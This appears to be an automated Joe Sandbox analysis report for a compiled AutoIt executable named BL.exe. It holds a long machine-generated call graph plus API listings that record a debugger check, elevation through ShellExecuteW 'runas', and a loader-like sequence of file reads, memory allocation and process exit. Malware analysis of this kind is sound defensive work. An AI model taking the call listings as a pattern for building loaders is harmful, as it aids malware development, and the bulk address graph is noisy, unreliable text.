41ba47 __wfsopen 86065->86066 86067 41baa2 86066->86067 86070 418407 __lock 67 API calls 86066->86070 
86068 41bac4 __wfsopen 86067->86068 86069 41baa7 EnterCriticalSection 86067->86069 86068->86048 86069->86068 86071 41ba73 86070->86071 86072 41ba8a 86071->86072 86073 4189e6 __mtinitlocknum InitializeCriticalSectionAndSpinCount 86071->86073 86074 41bad2 ___lock_fhandle LeaveCriticalSection 86072->86074 86073->86072 86074->86067 86076 41b9c4 __chsize_nolock 67 API calls 86075->86076 86077 41ef6e 86076->86077 86078 41ef84 SetFilePointer 86077->86078 86079 41ef74 86077->86079 86080 41ef9b GetLastError 86078->86080 86083 41efa3 86078->86083 86081 417f23 __wcstombs_l_helper 67 API calls 86079->86081 86080->86083 86082 41ef79 86081->86082 86082->86055 86083->86082 86084 417f49 __dosmaperr 67 API calls 86083->86084 86084->86082 86085->86040 86086->86046 86087->86041 86088->86047 86090->86054 86091->86055 86092->86046 86094 414e31 86093->86094 86095 414e4d 86093->86095 86139 417f23 67 API calls __getptd_noexit 86094->86139 86097 41486c __flush 101 API calls 86095->86097 86102 414e46 86095->86102 86099 414e59 86097->86099 86098 414e36 86140 417ebb 6 API calls 2 library calls 86098->86140 86112 41e680 86099->86112 86111 414f08 LeaveCriticalSection LeaveCriticalSection _fprintf 86102->86111 86104 41453a __fileno 67 API calls 86105 414e67 86104->86105 86116 41e5b3 86105->86116 86107 414e6d 86107->86102 86108 413a88 __getptd_noexit 67 API calls 86107->86108 86108->86102 86109->85842 86111->85846 86113 414e61 86112->86113 86114 41e690 86112->86114 86113->86104 86114->86113 86115 413a88 __getptd_noexit 67 API calls 86114->86115 86115->86113 86117 41e5bf __wfsopen 86116->86117 86118 41e5e2 86117->86118 86119 41e5c7 86117->86119 86121 41e5f0 86118->86121 86125 41e631 86118->86125 86156 417f36 67 API calls __getptd_noexit 86119->86156 86158 417f36 67 API calls __getptd_noexit 86121->86158 86123 41e5cc 86157 417f23 67 API calls __getptd_noexit 86123->86157 86124 41e5f5 86159 417f23 67 API calls __getptd_noexit 86124->86159 86128 41ba3b ___lock_fhandle 68 API calls 86125->86128 86130 
41e637 86128->86130 86129 41e5fc 86160 417ebb 6 API calls 2 library calls 86129->86160 86132 41e652 86130->86132 86133 41e644 86130->86133 86161 417f23 67 API calls __getptd_noexit 86132->86161 86141 41e517 86133->86141 86134 41e5d4 __wfsopen 86134->86107 86137 41e64c 86162 41e676 LeaveCriticalSection __unlock_fhandle 86137->86162 86139->86098 86163 41b9c4 86141->86163 86143 41e57d 86176 41b93e 68 API calls 2 library calls 86143->86176 86144 41e527 86144->86143 86147 41b9c4 __chsize_nolock 67 API calls 86144->86147 86155 41e55b 86144->86155 86146 41e585 86154 41e5a7 86146->86154 86177 417f49 67 API calls 3 library calls 86146->86177 86149 41e552 86147->86149 86148 41b9c4 __chsize_nolock 67 API calls 86150 41e567 CloseHandle 86148->86150 86152 41b9c4 __chsize_nolock 67 API calls 86149->86152 86150->86143 86153 41e573 GetLastError 86150->86153 86152->86155 86153->86143 86154->86137 86155->86143 86155->86148 86156->86123 86157->86134 86158->86124 86159->86129 86161->86137 86162->86134 86164 41b9d1 86163->86164 86165 41b9e9 86163->86165 86166 417f36 __locking 67 API calls 86164->86166 86168 417f36 __locking 67 API calls 86165->86168 86170 41ba2e 86165->86170 86167 41b9d6 86166->86167 86169 417f23 __wcstombs_l_helper 67 API calls 86167->86169 86171 41ba17 86168->86171 86173 41b9de 86169->86173 86170->86144 86172 417f23 __wcstombs_l_helper 67 API calls 86171->86172 86174 41ba1e 86172->86174 86173->86144 86175 417ebb __wcstombs_l_helper 6 API calls 86174->86175 86175->86170 86176->86146 86177->86154 86179 415126 __wfsopen 86178->86179 86180 41516f 86179->86180 86181 41513a _memset 86179->86181 86190 415164 __wfsopen 86179->86190 86182 415965 __lock_file 68 API calls 86180->86182 86207 417f23 67 API calls __getptd_noexit 86181->86207 86183 415177 86182->86183 86191 414f10 86183->86191 86186 415154 86208 417ebb 6 API calls 2 library calls 86186->86208 86190->85851 86194 414f2e _memset 86191->86194 86197 414f4c 86191->86197 86192 414f37 86260 417f23 67 API calls 
__getptd_noexit 86192->86260 86194->86192 86194->86197 86203 414f8b 86194->86203 86195 414f3c 86261 417ebb 6 API calls 2 library calls 86195->86261 86209 4151a6 LeaveCriticalSection LeaveCriticalSection _fprintf 86197->86209 86199 4150d5 _memset 86264 417f23 67 API calls __getptd_noexit 86199->86264 86200 4150a9 _memset 86263 417f23 67 API calls __getptd_noexit 86200->86263 86201 41453a __fileno 67 API calls 86201->86203 86203->86197 86203->86199 86203->86200 86203->86201 86210 41ed9e 86203->86210 86240 41e6b1 86203->86240 86262 41ee9b 67 API calls 3 library calls 86203->86262 86207->86186 86209->86190 86211 41edaa __wfsopen 86210->86211 86212 41edb2 86211->86212 86213 41edcd 86211->86213 86334 417f36 67 API calls __getptd_noexit 86212->86334 86215 41eddb 86213->86215 86218 41ee1c 86213->86218 86336 417f36 67 API calls __getptd_noexit 86215->86336 86216 41edb7 86335 417f23 67 API calls __getptd_noexit 86216->86335 86221 41ee29 86218->86221 86222 41ee3d 86218->86222 86220 41ede0 86337 417f23 67 API calls __getptd_noexit 86220->86337 86339 417f36 67 API calls __getptd_noexit 86221->86339 86225 41ba3b ___lock_fhandle 68 API calls 86222->86225 86227 41ee43 86225->86227 86226 41ee2e 86340 417f23 67 API calls __getptd_noexit 86226->86340 86229 41ee50 86227->86229 86230 41ee66 86227->86230 86265 41e7dc 86229->86265 86341 417f23 67 API calls __getptd_noexit 86230->86341 86232 41ede7 86338 417ebb 6 API calls 2 library calls 86232->86338 86235 41edbf __wfsopen 86235->86203 86236 41ee5e 86343 41ee91 LeaveCriticalSection __unlock_fhandle 86236->86343 86237 41ee6b 86342 417f36 67 API calls __getptd_noexit 86237->86342 86241 41e6c1 86240->86241 86244 41e6de 86240->86244 86347 417f23 67 API calls __getptd_noexit 86241->86347 86243 41e6c6 86348 417ebb 6 API calls 2 library calls 86243->86348 86246 41e713 86244->86246 86252 41e6d6 86244->86252 86344 423600 86244->86344 86248 41453a __fileno 67 API calls 86246->86248 86249 41e727 86248->86249 86250 41ed9e __read 79 API calls 
86249->86250 86251 41e72e 86250->86251 86251->86252 86253 41453a __fileno 67 API calls 86251->86253 86252->86203 86254 41e751 86253->86254 86254->86252 86255 41453a __fileno 67 API calls 86254->86255 86256 41e75d 86255->86256 86256->86252 86257 41453a __fileno 67 API calls 86256->86257 86258 41e769 86257->86258 86259 41453a __fileno 67 API calls 86258->86259 86259->86252 86260->86195 86262->86203 86263->86195 86264->86195 86266 41e813 86265->86266 86267 41e7f8 86265->86267 86269 41e822 86266->86269 86272 41e849 86266->86272 86268 417f36 __locking 67 API calls 86267->86268 86271 41e7fd 86268->86271 86270 417f36 __locking 67 API calls 86269->86270 86273 41e827 86270->86273 86275 417f23 __wcstombs_l_helper 67 API calls 86271->86275 86274 41e868 86272->86274 86285 41e87c 86272->86285 86276 417f23 __wcstombs_l_helper 67 API calls 86273->86276 86277 417f36 __locking 67 API calls 86274->86277 86286 41e805 86275->86286 86279 41e82e 86276->86279 86281 41e86d 86277->86281 86278 41e8d4 86280 417f36 __locking 67 API calls 86278->86280 86282 417ebb __wcstombs_l_helper 6 API calls 86279->86282 86283 41e8d9 86280->86283 86284 417f23 __wcstombs_l_helper 67 API calls 86281->86284 86282->86286 86287 417f23 __wcstombs_l_helper 67 API calls 86283->86287 86288 41e874 86284->86288 86285->86278 86285->86286 86289 41e8b0 86285->86289 86290 41e8f5 86285->86290 86286->86236 86287->86288 86291 417ebb __wcstombs_l_helper 6 API calls 86288->86291 86289->86278 86297 41e8bb ReadFile 86289->86297 86292 416fb6 __malloc_crt 67 API calls 86290->86292 86291->86286 86294 41e90b 86292->86294 86300 41e931 86294->86300 86301 41e913 86294->86301 86295 41ed62 GetLastError 86298 41ebe8 86295->86298 86299 41ed6f 86295->86299 86296 41e9e7 86296->86295 86304 41e9fb 86296->86304 86297->86295 86297->86296 86308 417f49 __dosmaperr 67 API calls 86298->86308 86313 41eb6d 86298->86313 86302 417f23 __wcstombs_l_helper 67 API calls 86299->86302 86305 423462 __lseeki64_nolock 69 API calls 86300->86305 86303 417f23 
__wcstombs_l_helper 67 API calls 86301->86303 86306 41ed74 86302->86306 86307 41e918 86303->86307 86304->86313 86314 41ea17 86304->86314 86317 41ec2d 86304->86317 86309 41e93d 86305->86309 86310 417f36 __locking 67 API calls 86306->86310 86311 417f36 __locking 67 API calls 86307->86311 86308->86313 86309->86297 86310->86313 86311->86286 86312 413a88 __getptd_noexit 67 API calls 86312->86286 86313->86286 86313->86312 86315 41ea7d ReadFile 86314->86315 86322 41eafa 86314->86322 86318 41ea9b GetLastError 86315->86318 86327 41eaa5 86315->86327 86316 41eca5 ReadFile 86319 41ecc4 GetLastError 86316->86319 86325 41ecce 86316->86325 86317->86313 86317->86316 86318->86314 86318->86327 86319->86317 86319->86325 86320 41ebbe MultiByteToWideChar 86320->86313 86321 41ebe2 GetLastError 86320->86321 86321->86298 86322->86313 86323 41eb75 86322->86323 86324 41eb68 86322->86324 86330 41eb32 86322->86330 86323->86330 86331 41ebac 86323->86331 86326 417f23 __wcstombs_l_helper 67 API calls 86324->86326 86325->86317 86329 423462 __lseeki64_nolock 69 API calls 86325->86329 86326->86313 86327->86314 86328 423462 __lseeki64_nolock 69 API calls 86327->86328 86328->86327 86329->86325 86330->86320 86332 423462 __lseeki64_nolock 69 API calls 86331->86332 86333 41ebbb 86332->86333 86333->86320 86334->86216 86335->86235 86336->86220 86337->86232 86339->86226 86340->86232 86341->86237 86342->86236 86343->86235 86345 416fb6 __malloc_crt 67 API calls 86344->86345 86346 423615 86345->86346 86346->86246 86347->86243 86352 414cef GetSystemTimeAsFileTime __aulldiv 86349->86352 86351 4431ef 86351->85854 86352->86351 86353->85862 86355->85867 86359 4523e1 _wcscpy 86356->86359 86357 44afdc GetSystemTimeAsFileTime 86357->86359 86358 452553 86358->85784 86358->85785 86359->86357 86359->86358 86360 4151b0 81 API calls __fread_nolock 86359->86360 86361 41557c 105 API calls _fseek 86359->86361 86360->86359 86361->86359 86363 44b1b4 86362->86363 86364 44b1a6 86362->86364 86366 44b1ca 86363->86366 86367 414e06 
138 API calls 86363->86367 86368 44b1c2 86363->86368 86365 414e06 138 API calls 86364->86365 86365->86363 86397 4352d1 81 API calls 2 library calls 86366->86397 86369 44b2c1 86367->86369 86368->85813 86369->86366 86371 44b2cf 86369->86371 86375 44b2dc 86371->86375 86376 414e94 __fcloseall 106 API calls 86371->86376 86372 44b20d 86373 44b211 86372->86373 86374 44b23b 86372->86374 86378 414e94 __fcloseall 106 API calls 86373->86378 86380 44b21e 86373->86380 86398 43526e 86374->86398 86375->85813 86376->86375 86378->86380 86379 44b242 86382 44b270 86379->86382 86383 44b248 86379->86383 86381 414e94 __fcloseall 106 API calls 86380->86381 86385 44b22e 86380->86385 86381->86385 86408 44b0af 111 API calls 86382->86408 86386 44b255 86383->86386 86389 414e94 __fcloseall 106 API calls 86383->86389 86385->85813 86387 44b265 86386->86387 86390 414e94 __fcloseall 106 API calls 86386->86390 86387->85813 86388 44b276 86409 43522c 67 API calls __getptd_noexit 86388->86409 86389->86386 86390->86387 86392 44b27c 86393 44b289 86392->86393 86394 414e94 __fcloseall 106 API calls 86392->86394 86395 44b299 86393->86395 86396 414e94 __fcloseall 106 API calls 86393->86396 86394->86393 86395->85813 86396->86395 86397->86372 86399 4138ba _malloc 67 API calls 86398->86399 86400 43527d 86399->86400 86401 4138ba _malloc 67 API calls 86400->86401 86402 43528d 86401->86402 86403 4138ba _malloc 67 API calls 86402->86403 86404 43529d 86403->86404 86406 4352bc 86404->86406 86410 43522c 67 API calls __getptd_noexit 86404->86410 86406->86379 86407 4352c8 86407->86379 86408->86388 86409->86392 86410->86407 86411->85700 86412->85702 86413->85721 86414->85721 86415->85721 86416->85715 86417->85721 86418->85721 86419->85725 86420->85734 86422->85736 86423->85625 86425 410148 SHGetDesktopFolder 86424->86425 86426 4101a3 _wcscpy 86424->86426 86425->86426 86427 41015a _wcscpy 86425->86427 86426->85629 86427->86426 86428 41018a SHGetPathFromIDListW 86427->86428 86428->86426 86429->85631 86431 40f5e0 152 API 
calls 86430->86431 86432 40f417 86431->86432 86433 42ca37 86432->86433 86434 40f42c 86432->86434 86435 42ca1f 86432->86435 86436 452574 140 API calls 86433->86436 86468 4037e0 139 API calls 7 library calls 86434->86468 86469 43717f 110 API calls _printf 86435->86469 86439 42ca50 86436->86439 86442 42ca76 86439->86442 86443 42ca54 86439->86443 86440 40f446 86440->85628 86441 42ca2d 86441->86433 86444 41171a 75 API calls 86442->86444 86445 434fe1 106 API calls 86443->86445 86457 42cacc moneypunct 86444->86457 86446 42ca5e 86445->86446 86470 43717f 110 API calls _printf 86446->86470 86448 42ccc3 86450 413a88 __getptd_noexit 67 API calls 86448->86450 86449 42ca6c 86449->86442 86451 42cccd 86450->86451 86452 434fe1 106 API calls 86451->86452 86453 42ccda 86452->86453 86457->86448 86458 401b70 75 API calls 86457->86458 86461 402cc0 75 API calls 2 library calls 86457->86461 86462 4026a0 86457->86462 86471 445051 75 API calls _memcpy_s 86457->86471 86472 44c80c 87 API calls 3 library calls 86457->86472 86473 44b408 75 API calls 86457->86473 86458->86457 86461->86457 86463 4026af 86462->86463 86466 40276b 86462->86466 86464 41171a 75 API calls 86463->86464 86463->86466 86467 4026ee moneypunct 86463->86467 86464->86467 86465 41171a 75 API calls 86465->86467 86466->86457 86467->86465 86467->86466 86468->86440 86469->86441 86470->86449 86471->86457 86472->86457 86473->86457 86474->85639 86475->85638 86477 401bfb 86476->86477 86497 401cde 86476->86497 86499 4013a0 86477->86499 86480 42a9a0 LoadStringW 86483 42a9bb 86480->86483 86481 401c18 86482 4021e0 75 API calls 86481->86482 86484 401c2d 86482->86484 86505 40df50 75 API calls 86483->86505 86486 401c3a 86484->86486 86487 42a9cd 86484->86487 86486->86483 86488 401c44 86486->86488 86506 40d3b0 75 API calls 2 library calls 86487->86506 86504 40d3b0 75 API calls 2 library calls 86488->86504 86491 42a9dc 86492 42a9f0 86491->86492 86494 401c53 _memset _wcscpy _wcsncpy 86491->86494 86507 40d3b0 75 API calls 2 library calls 
86492->86507 86496 401cc2 Shell_NotifyIconW 86494->86496 86495 42a9fe 86496->86497 86497->85650 86498->85644 86500 41171a 75 API calls 86499->86500 86501 4013c4 86500->86501 86502 401380 75 API calls 86501->86502 86503 4013d3 86502->86503 86503->86480 86503->86481 86504->86494 86505->86494 86506->86491 86507->86495 86508 3ddc3b8 86522 3dda008 86508->86522 86510 3ddc47f 86525 3ddc2a8 86510->86525 86512 3ddc4a8 CreateFileW 86514 3ddc4fc 86512->86514 86515 3ddc4f7 86512->86515 86514->86515 86516 3ddc513 VirtualAlloc 86514->86516 86516->86515 86517 3ddc531 ReadFile 86516->86517 86517->86515 86518 3ddc54c 86517->86518 86519 3ddb2a8 13 API calls 86518->86519 86521 3ddc57f 86519->86521 86520 3ddc5a2 ExitProcess 86520->86515 86521->86520 86528 3ddd4a8 GetPEB 86522->86528 86524 3dda693 86524->86510 86526 3ddc2b1 Sleep 86525->86526 86527 3ddc2bf 86526->86527 86529 3ddd4d2 86528->86529 86529->86524 86530 444343 86533 444326 86530->86533 86532 44434e WriteFile 86534 444340 86533->86534 86535 4442c7 86533->86535 86534->86532 86540 40e190 SetFilePointerEx 86535->86540 86537 4442e0 SetFilePointerEx 86541 40e190 SetFilePointerEx 86537->86541 86539 4442ff 86539->86532 86540->86537 86541->86539 86542 46d22f 86545 46d098 86542->86545 86544 46d241 86546 46d0b5 86545->86546 86547 46d115 86546->86547 86548 46d0b9 86546->86548 86596 45c216 78 API calls 86547->86596 86549 41171a 75 API calls 86548->86549 86551 46d0c0 86549->86551 86553 46d0cc 86551->86553 86593 40d940 76 API calls 86551->86593 86552 46d126 86554 46d0f8 86552->86554 86561 46d142 86552->86561 86558 453063 111 API calls 86553->86558 86555 4092c0 VariantClear 86554->86555 86557 46d0fd 86555->86557 86557->86544 86559 46d0dd 86558->86559 86594 40dfa0 83 API calls 86559->86594 86562 46d1c8 86561->86562 86563 46d158 86561->86563 86601 4676a3 78 API calls 86562->86601 86566 453063 111 API calls 86563->86566 86564 46d0ea 86564->86561 86567 46d0ee 86564->86567 86572 46d15e 86566->86572 86567->86554 86595 44ade5 CloseHandle 
moneypunct 86567->86595 86568 46d1ce 86602 4444c2 SetFilePointerEx SetFilePointerEx WriteFile 86568->86602 86569 46d18d 86597 467fce 82 API calls 86569->86597 86571 46d196 86576 4013a0 75 API calls 86571->86576 86572->86569 86572->86571 86575 46d194 86583 46d224 86575->86583 86589 40d900 86575->86589 86578 46d1a2 86576->86578 86577 46d1e7 86577->86575 86580 4092c0 VariantClear 86577->86580 86598 40df50 75 API calls 86578->86598 86580->86575 86581 46d1ac 86599 40d3b0 75 API calls 2 library calls 86581->86599 86583->86544 86584 46d1b8 86600 467fce 82 API calls 86584->86600 86587 46d216 86603 44ade5 CloseHandle moneypunct 86587->86603 86590 40d917 86589->86590 86591 40d909 86589->86591 86590->86591 86592 40d91c CloseHandle 86590->86592 86591->86587 86592->86587 86593->86553 86594->86564 86595->86554 86596->86552 86597->86575 86598->86581 86599->86584 86600->86575 86601->86568 86602->86577 86603->86583 86604 42919b 86609 40ef10 86604->86609 86607 411421 __cinit 74 API calls 86608 4291aa 86607->86608 86610 41171a 75 API calls 86609->86610 86611 40ef17 86610->86611 86612 42ad48 86611->86612 86617 40ef40 74 API calls __cinit 86611->86617 86614 40ef2a 86618 40e470 86614->86618 86617->86614 86619 40c060 75 API calls 86618->86619 86620 40e483 GetVersionExW 86619->86620 86621 4021e0 75 API calls 86620->86621 86622 40e4bb 86621->86622 86644 40e600 86622->86644 86628 42accc 86630 42ad28 GetSystemInfo 86628->86630 86633 42ad38 GetSystemInfo 86630->86633 86631 40e557 GetCurrentProcess 86664 40ee30 LoadLibraryA GetProcAddress 86631->86664 86636 40e5c9 86661 40eea0 86636->86661 86638 40e56c 86638->86633 86657 40eee0 86638->86657 86640 40e5e0 86642 40e5f1 FreeLibrary 86640->86642 86643 40e5f4 86640->86643 86641 40e5dd FreeLibrary 86641->86640 86642->86643 86643->86607 86645 40e60b 86644->86645 86646 40c740 75 API calls 86645->86646 86647 40e4c2 86646->86647 86648 40e620 86647->86648 86650 40e62a 86648->86650 86649 42ac93 86650->86649 86651 40c740 75 API calls 86650->86651 86652 
40e4ce 86651->86652 86652->86628 86653 40ee70 86652->86653 86654 40e551 86653->86654 86655 40ee76 LoadLibraryA 86653->86655 86654->86631 86654->86638 86655->86654 86656 40ee87 GetProcAddress 86655->86656 86656->86654 86658 40e5bf 86657->86658 86659 40eee6 LoadLibraryA 86657->86659 86658->86630 86658->86636 86659->86658 86660 40eef7 GetProcAddress 86659->86660 86660->86658 86665 40eec0 LoadLibraryA GetProcAddress 86661->86665 86663 40e5d3 GetNativeSystemInfo 86663->86640 86663->86641 86664->86638 86665->86663 86666 4733ec 86667 4733fd 86666->86667 86670 473436 86666->86670 86667->86670 86671 47340d 86667->86671 86668 453063 111 API calls 86669 473457 86668->86669 86678 4723ab 86669->86678 86670->86668 86674 4092c0 VariantClear 86671->86674 86673 473486 86675 47348f 86673->86675 86677 4092c0 VariantClear 86673->86677 86676 473416 86674->86676 86677->86675 86679 4092c0 VariantClear 86678->86679 86680 4723b7 86679->86680 86681 41171a 75 API calls 86680->86681 86682 4723be 86681->86682 86685 46edc6 86682->86685 86684 4723d9 86684->86673 86686 45335b 76 API calls 86685->86686 86689 46eddb 86686->86689 86687 401cf0 75 API calls 86687->86689 86688 46ee27 86690 46ee36 86688->86690 86692 401cf0 75 API calls 86688->86692 86689->86687 86689->86688 86711 46f1ed 86689->86711 86691 41171a 75 API calls 86690->86691 86693 46ee64 86691->86693 86692->86690 86694 40c060 75 API calls 86693->86694 86695 46ee95 86694->86695 86696 40c060 75 API calls 86695->86696 86697 46ee9e 86696->86697 86698 40c060 75 API calls 86697->86698 86705 46eea7 86698->86705 86699 46f19c 86700 41171a 75 API calls 86699->86700 86704 46f264 _memset 86699->86704 86702 46f1de 86700->86702 86701 4021e0 75 API calls 86701->86705 86703 41171a 75 API calls 86702->86703 86703->86704 86704->86684 86705->86699 86705->86701 86706 4134d9 78 API calls 86705->86706 86707 403470 75 API calls 86705->86707 86708 41349d 78 API calls 86705->86708 86709 413431 78 API calls 86705->86709 86705->86711 86712 40df50 75 API calls 
86705->86712 86706->86705 86707->86705 86708->86705 86709->86705 86711->86684 86712->86705 86713 40116e 86714 401119 DefWindowProcW 86713->86714

Control-flow Graph

APIs
• GetCurrentDirectoryW.KERNEL32(00000104,?,00000001,?,00000000), ref: 0040D6E5
  • Part of subcall function 00401F80: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\BL.exe,00000104,?,?,?,?,00000000), ref: 00401FAD
  • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 00402078
  • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 0040208E
  • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 004020A4
  • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 004020BA
  • Part of subcall function 00401F80: _wcscpy.LIBCMT ref: 004020EF
• IsDebuggerPresent.KERNEL32(?), ref: 0040D6F1
• GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\BL.exe,00000104,?,004A7CF8,004A7CFC), ref: 0040D763
  • Part of subcall function 00401440: GetFullPathNameW.KERNEL32(?,00000104,?,00000000), ref: 00401483
• SetCurrentDirectoryW.KERNEL32(?,00000001,C:\Users\user\Desktop\BL.exe,00000004), ref: 0040D7D6
• MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,004846D6,00000010), ref: 00431AAB
• SetCurrentDirectoryW.KERNEL32(?,C:\Users\user\Desktop\BL.exe,00000004), ref: 00431B0E
• GetModuleFileNameW.KERNEL32(00000000,?,00000104,C:\Users\user\Desktop\BL.exe,00000004), ref: 00431B3F
• GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 00431B8B
• ShellExecuteW.SHELL32(00000000), ref: 00431B92
  • Part of subcall function 004101F0: GetSysColorBrush.USER32(0000000F), ref: 004101F9
  • Part of subcall function 004101F0: LoadCursorW.USER32(00000000,00007F00), ref: 00410209
  • Part of subcall function 004101F0: LoadIconW.USER32(?,00000063), ref: 0041021F
  • Part of subcall function 004101F0: LoadIconW.USER32(?,000000A4), ref: 00410232
  • Part of subcall function 004101F0: LoadIconW.USER32(?,000000A2), ref: 00410245
  • Part of subcall function 004101F0: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041026A
  • Part of subcall function 004101F0: RegisterClassExW.USER32 ref: 004102C6
  • Part of subcall function 004103E0: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 00410415
  • Part of subcall function 004103E0: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 0041043E
  • Part of subcall function 004103E0: ShowWindow.USER32(?,00000000), ref: 00410454
  • Part of subcall function 004103E0: ShowWindow.USER32(?,00000000), ref: 0041045E
  • Part of subcall function 0040E1E0: _memset.LIBCMT ref: 0040E202
  • Part of subcall function 0040E1E0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E2C7
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memset_wcscpy
                                                                                                                            • String ID: @GH$@GH$C:\Users\user\Desktop\BL.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                                                                                            • API String ID: 2493088469-2479709004
                                                                                                                            • Opcode ID: ba2e87c3f8820592b330de56266d8528cb530a4dab1fa245838381ec475db17a
                                                                                                                            • Instruction ID: f6e0ab4c143dd9a1f797559286fb6c41f0380d60009eb7dc722615656bf0e84e
                                                                                                                            • Opcode Fuzzy Hash: ba2e87c3f8820592b330de56266d8528cb530a4dab1fa245838381ec475db17a
                                                                                                                            • Instruction Fuzzy Hash: 0341F731618341ABD320F7A19C49BAF3BA4AB96704F04493FF941672D1DBBC9949C72E

                                                                                                                            Control-flow Graph

                                                                                                                            control_flow_graph 138 40e470-40e500 call 40c060 GetVersionExW call 4021e0 call 40e600 call 40e620 147 40e506-40e509 138->147 148 42accc-42acd1 138->148 149 40e540-40e555 call 40ee70 147->149 150 40e50b-40e51c 147->150 151 42acd3-42acdb 148->151 152 42acdd-42ace0 148->152 169 40e557-40e573 GetCurrentProcess call 40ee30 149->169 170 40e579-40e5a8 149->170 153 40e522-40e525 150->153 154 42ac9b-42aca7 150->154 156 42ad12-42ad20 151->156 157 42ace2-42aceb 152->157 158 42aced-42acf0 152->158 153->149 160 40e527-40e537 153->160 162 42acb2-42acba 154->162 163 42aca9-42acad 154->163 168 42ad28-42ad2d GetSystemInfo 156->168 157->156 158->156 159 42acf2-42ad06 158->159 164 42ad08-42ad0c 159->164 165 42ad0e 159->165 166 42acbf-42acc7 160->166 167 40e53d 160->167 162->149 163->149 164->156 165->156 166->149 167->149 172 42ad38-42ad3d GetSystemInfo 168->172 169->170 180 40e575 169->180 170->172 173 40e5ae-40e5c3 call 40eee0 170->173 173->168 177 40e5c9-40e5db call 40eea0 GetNativeSystemInfo 173->177 182 40e5e0-40e5ef 177->182 183 40e5dd-40e5de FreeLibrary 177->183 180->170 184 40e5f1-40e5f2 FreeLibrary 182->184 185 40e5f4-40e5ff 182->185 183->182 184->185
                                                                                                                            APIs
                                                                                                                            • GetVersionExW.KERNEL32 ref: 0040E495
                                                                                                                              • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                            • GetCurrentProcess.KERNEL32(?,?), ref: 0040E560
                                                                                                                            • GetNativeSystemInfo.KERNELBASE(?,?), ref: 0040E5D3
                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 0040E5DE
                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 0040E5F2
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_wcslen
                                                                                                                            • String ID: pMH$#v
                                                                                                                            • API String ID: 2923339712-1800489730
                                                                                                                            • Opcode ID: 3f36deb7b7369dd68d3c05326faf84e57561e58110467ef3184d2bc56fc1d5cf
                                                                                                                            • Instruction ID: 31d199e0849a18b4fe3a20375a839c17b1fda7a8e5a404adfed2e153d323e8b3
                                                                                                                            • Opcode Fuzzy Hash: 3f36deb7b7369dd68d3c05326faf84e57561e58110467ef3184d2bc56fc1d5cf
                                                                                                                            • Instruction Fuzzy Hash: D4612E71508792AEC311CB69C44425ABFE07B6A308F580E6EE48483A42D379E568C7AB
                                                                                                                            APIs
                                                                                                                            • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EB55,0040D86E), ref: 0040EB7B
                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EB8D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
